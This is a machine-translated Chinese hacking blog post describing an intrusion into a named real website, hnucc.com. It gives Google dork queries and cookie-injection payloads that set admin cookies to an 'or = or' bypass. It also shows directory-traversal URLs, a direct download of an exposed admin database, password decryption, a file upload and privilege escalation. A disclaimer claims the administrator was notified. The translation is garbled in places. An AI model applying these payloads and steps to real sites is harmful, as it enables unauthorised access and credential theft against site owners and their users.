I am posting this post only for your technical exchange. Please do not mount a Trojan on your website to avoid unnecessary troubles. The website vulnerability has been notified to the administrator !!
Waiting for blog:Http://www.waitalone.cn/Reprinted please indicate the source!
Take a look at it. The website is very beautiful. First, google is used to collect some information. site: hnucc.com inurl: edit.
Http://www.hnucc.com/kyc/news/Edit/Directory. After preliminary detection, the background login address is deleted, and there are no traces in the database changed by the predecessors. Then, we can continue to check and find a login address:Http://www.hnucc.com/kyc/news/login.aspThe interface is like a Messaging Management System, which has cookie injection and directory traversal.
Enter javascript: alert (document. cookie = "adminuser =" + escape ("or = or"); javascript: alert (document. cookie = "adminpass =" + escape ("or = or"); javascript: alert (document. cookie = "admindj =" + escape ("1 "));
Then, enter the address:Http://www.hnucc.com/kyc/news/Edit/admin_PreviousFile.asp? Id = 14 & dir = ../.. You can traverse the directory, for example:
Next stepHttp://www.hnucc.com/kyc/news/Edit/admin_PreviousFile.asp? Id = 14 & dir = ../../../.. Jump to the root directory of the website and find a lot of directories. It seems that something is going on, huh, huh!
The easylink directory has a logon address.Http://www.hnucc.com/easylink/Manage/Login.aspThis kind of enterprise background, I remember there was a universal password to access, but he filtered it here and we downloaded the database.
Http://www.hnucc.com/easylink/Database/DataShopWhict_Easylink.mdbAfter downloading it, we found that the management password is encrypted. Once you see that you are from relay, OK is decrypted to get the Administrator's username and password. After logging in, we found that there is a database backup,
The test failed. Finally, you can find the Upload File and use the upload file! I don't know about the rest of the work. The elevation of permission was successful, and a file was left in the root directory of the website to the Administrator!